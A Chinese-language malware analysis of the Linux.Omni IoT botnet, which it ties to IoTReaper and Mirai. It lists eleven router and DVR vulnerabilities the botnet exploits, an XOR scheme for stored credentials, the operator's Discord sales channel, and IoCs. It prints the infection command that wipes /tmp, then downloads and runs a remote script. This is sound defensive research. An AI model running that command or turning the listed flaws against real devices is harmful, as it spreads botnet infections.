針對新型IoT殭屍網路Linux.Omni的分析

一、概述

長期以來，我們對網路上活動的Linux和IoT威脅進行分類和分析工作。本文將主要介紹針對Linux.Omni殭屍網路進行分析，我們從部署的蜜罐中檢測到該惡意軟體。之所以這個殭屍網路引起了我們的注意，是因為它的感染庫中包含高達11種不同的漏洞。經過分析，我們最終確定該威脅屬於IoTReaper的新版本。

二、二進位分析

首先，讓我們感到驚訝的第一件事就是該惡意軟體的分類，也就是OMNI。近幾周來，我們檢測到了OWARI、TOKYO、SORA、ECCHI等等，所有這些惡意軟體都是Gafgyt和Mirai的分支版本。並且，所有這些惡意軟體與之前的分析結果相比，沒有任何創新。

因此，分析該惡意軟體的感染方式，我們發現如下說明：

如我們所見，這是一個非常常見的腳本，通過另一個殭屍網路感染。

儘管當前，一切證據都表明這個樣本是Mirai或Gafgyt的一個常見變種，但我們還是對樣本進行了下載和分析。

在分析過程中，我們初步發現二進位文件是使用UPX進行加殼的，這在大多數同類型樣本中不是很常見，但在其他一些流行的殭屍網路變種中卻並不罕見。

經過查看二進位文件後，我們發現其二進位文件的基本結構與Mirai相匹配。

但是，我們在分析二進位文件中的感染選項時，發現其攻擊方式存在不同。除了使用默認憑據進行傳播之外，它還利用了已經在IoTReaper、Okiru、Satori等其他殭屍網路中發現的IoT設備漏洞，包括近期發現的影響GPON路由器的漏洞。

接下來，讓我們來仔細分析Omni所使用的漏洞。

2.1 Vacron

在「board.cgi」中，使用了VACRON網路視頻錄像機中代碼注入的漏洞，該參數在HTTP請求解析中，並沒有得到較好的調試。我們曾發現IoTReaper殭屍網路利用了這一漏洞。

2.2 Netgear – CVE-2016-6277

在Omni中發現的另一個漏洞是CVE-2016-6277，該漏洞是通過對受影響路由器的cgi-bin/目錄進行GET請求實現，最終導致遠程代碼執行。該漏洞影響Netgear如下型號的路由器：R6400、R7000、R7000P、R7500、R7800、R8000、R8500、R9000。

2.3 D-Link – 通過UPnP進行操作系統命令注入

與IoTReaper一樣，Omni也利用了D-Link路由器的命令。殭屍網路利用了hedwig.cgi中存在的Cookie溢出漏洞，並通過UPnP介面實現命令注入。

請求如下：

我們可以在二進位文件中查看該漏洞：

受漏洞影響的固件版本如下：

·DIR-300 rev B – 2.14b01

·DIR-600 – 2.16b01

·DIR-645 – 1.04b01

·DIR-845 – 1.01b02

·DIR-865 – 1.05b03

2.4 CCTV-DVR

惡意軟體使用的另一個漏洞，影響了70多個不同的廠商。該漏洞與「/language/Swedish」資源相關，最終允許遠程執行代碼。

可以在這裡找到受該漏洞影響的設備列表：

http://www.kerneronsec.com/2016/02/remote-code-execution-in-cctv-dvrs-of.html

2.5 D-Link – HNAP

該漏洞在2014年被發現，允許繞過CAPTCHA登錄認證，同時允許外部攻擊者執行遠程代碼。該漏洞被惡意軟體The Moon使用。

該漏洞影響如下固件版本的D-Link路由器：

·DI-524 C1 3.23

·DIR-628 B2 1.20NA 1.22NA

·DIR-655 A1 1.30EA

2.6 TR-069 – SOAP

該漏洞在2016年11月，被Mirai殭屍網路利用，最終導致德國電信被攻陷。

漏洞如下：

二進位文件中相應部分如下：

2.7 華為HG532路由器 – 任意命令執行

華為HG532路由器中存在配置文件錯誤驗證的漏洞，攻擊者可以通過修改HTTP請求來利用這一漏洞，最終實現任意命令執行。

目前已經發現，Okiru、Satori惡意軟體利用了這一漏洞，並且我們已經在此前的文章進行了分析：https://www.securityartwork.es/2018/03/13/analysis-of-linux-okiru/

2.8 Netgear – Setup.cgi遠程代碼執行

該漏洞影響Netgear路由器DGN1000 1.1.00.48固件版本，在未經驗證的情況下，允許遠程執行代碼。

2.9 Realtek SDK

多個設備使用了帶有miniigd守護程序的Realtel SDK，這些守護程序存在通過UPnP SOAP介面實現的命令注入漏洞。該漏洞與上面提到的華為路由器漏洞一樣，已經發現被Okiru、Satori惡意軟體利用。

2.10 GPON

最後，我們發現了該殭屍網路利用的最新漏洞，該漏洞在上個月被發現，影響GPON路由器。目前，該漏洞已經在一些針對Linux伺服器的IoT殭屍網路和挖礦惡意程序中被利用。

此外，殭屍網路也通過默認憑證的方式實現擴散，這些憑證使用了與0x33不同的密鑰進行XOR編碼（0x33是該惡意軟體家族通常使用的密鑰），其中每個組合都使用不同的密鑰。

三、基礎設施分析

儘管攻擊方式各有不同，但在設備上執行的命令是相同的：

cd /tmp;rm -rf *;wget http://%s/;sh /tmp/

其下載的文件是bash腳本，該腳本會根據受感染設備的體系結構來下載不同的樣本。

我們可以看到，這裡進行的漏洞利用與我們所分析的樣本並不對應。在這裡，只會搜索具有潛在受漏洞影響的HTTP介面的設備，並且會檢查是否存在默認憑據的問題，從而感染其他設備。感染途徑共有兩種，一種是使用前面提到的11個漏洞，另一種是針對公開HTTP服務的潛在目標嘗試默認憑據登錄。

因此，該體系結構與之前我們發現IoTReaper殭屍網路的體系結構非常相似。

四、尋找Omni幕後黑手

通過對二進位文件的深入調查，我們找到了IP地址213.183.53 [.] 120，該IP地址作為樣本的下載伺服器。儘管沒有找到可用的目錄列表，但我們在根目錄中找到了一個「Discord」平台，該平台通常是遊戲玩家觀眾的文字和語音聊天工具。

由於該平台不需要任何許可權或邀請就能進入，我們使用了megahacker名稱，進入聊天。

在加入後，我們發現，聊天的主題並非遊戲，而是關於銷售殭屍網路服務的內容。

在房間內觀察了幾分鐘之後，我們發現在Omni背後的網路犯罪分子名為Scarface。並且，他為他的殭屍網路製作了一些非常酷的廣告海報。

此外，該網路犯罪分子還提供殭屍網路的用戶支持服務，並且接受潛在消費者提出的需求，正在嘗試提升殭屍網路，使其達到60 Gbps的目標。

我們發現，網路犯罪分子非常不專業，Scarface多次展示其使用殭屍網路獲得的「成績」，其中的一些數字非常荒謬。此外，該網路犯罪分子極其警惕，擔心每一位進入該聊天室的人都有可能是警察。

最終，我們確定了Linux.Omni惡意軟體實際上就是IoTReaper惡意軟體的更新版本，二者使用了相同的網路架構格式，並且Linux.Omni使用了Mirai的源代碼。

五、Yara規則

六、IoC

·213.183.53[.]120

·4cf7e64c3b9c1ad5fa57d0d0bbdeb930defcdf737fda9639955be1e78b06ded6

·6dfd411f2558e533728bfb04dd013049dd765d61e3c774788e3beca404e0fd73

·000b018848e7fd947e87f1d3b8432faccb3418e0029bde7db8abf82c552bbc63

·528344fd220eff87b7494ca94caed6eae7886d8003ad37154fdb7048029e880b

·cfca058a4d0a29b3da285a5df21b14c360fb3291dff3c941659fe27f3738ba3e

·ca6bc4e4c490999f97ee3fd1db41373fc0ba114dce2e88c538998d19a6f694da

·0fd93aeb2af3541daa152d9aff8388c89211b99d46ead1220c539fa178543bca

·377a49403cef46902e77ff323fcc9a8f74ea041743ccdbff41de3c063367c99a

·a159c7b5d2c38071eb11f5e28b26f7d8beaf6f0f19a8c704687f26bfa9958d78

·2f1d0794d24b7b4f164ebce5bdde6fccd57cdbf91ea90ec2f628caf7fd991ce4

喜歡這篇文章嗎？立刻分享出去讓更多人知道吧！